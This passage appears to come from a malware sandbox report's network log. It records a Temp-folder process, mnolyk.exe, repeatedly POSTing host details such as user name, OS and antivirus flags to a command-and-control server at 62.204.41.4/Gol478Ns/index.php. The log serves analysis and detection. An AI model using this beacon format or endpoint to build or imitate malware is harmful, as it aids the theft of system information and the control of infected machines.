Feb 7, 2023 20:03:37.584707975 CET	742	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
588	192.168.2.6	50313	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:37.774354935 CET	743	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:37.840990067 CET	743	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
589	192.168.2.6	50314	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:38.017064095 CET	744	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:38.083966017 CET	744	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.6	49779	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:05.232359886 CET	179	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:05.296737909 CET	179	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
590	192.168.2.6	50315	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:38.266612053 CET	745	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:38.330622911 CET	745	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
591	192.168.2.6	50316	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:38.501750946 CET	746	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:38.566030025 CET	746	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
592	192.168.2.6	50317	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:38.748559952 CET	747	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:38.814222097 CET	747	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
593	192.168.2.6	50318	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:38.985318899 CET	748	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:39.050878048 CET	748	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
594	192.168.2.6	50319	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:39.222800016 CET	749	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:39.286186934 CET	749	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
595	192.168.2.6	50320	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:39.480009079 CET	750	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:39.544099092 CET	750	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
596	192.168.2.6	50321	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:39.741322994 CET	751	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:39.805164099 CET	751	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
597	192.168.2.6	50322	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:39.988883018 CET	752	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:40.054217100 CET	752	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
598	192.168.2.6	50323	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:40.235917091 CET	753	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:40.301186085 CET	753	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
599	192.168.2.6	50324	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:40.470050097 CET	754	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:40.533003092 CET	754	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49724	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:52.311391115 CET	111	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:52.376157045 CET	111	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.6	49780	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:05.481040001 CET	180	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:05.545506954 CET	180	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
600	192.168.2.6	50325	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:40.711952925 CET	755	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:40.775124073 CET	755	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
601	192.168.2.6	50326	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:40.953159094 CET	756	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:41.014763117 CET	756	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
602	192.168.2.6	50327	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:41.188879967 CET	757	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:41.252693892 CET	757	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
603	192.168.2.6	50328	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:41.453965902 CET	758	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:41.523385048 CET	758	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
604	192.168.2.6	50329	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:41.705909014 CET	759	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:41.767422915 CET	759	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
605	192.168.2.6	50330	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:41.942562103 CET	760	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:42.005326986 CET	760	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
606	192.168.2.6	50331	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
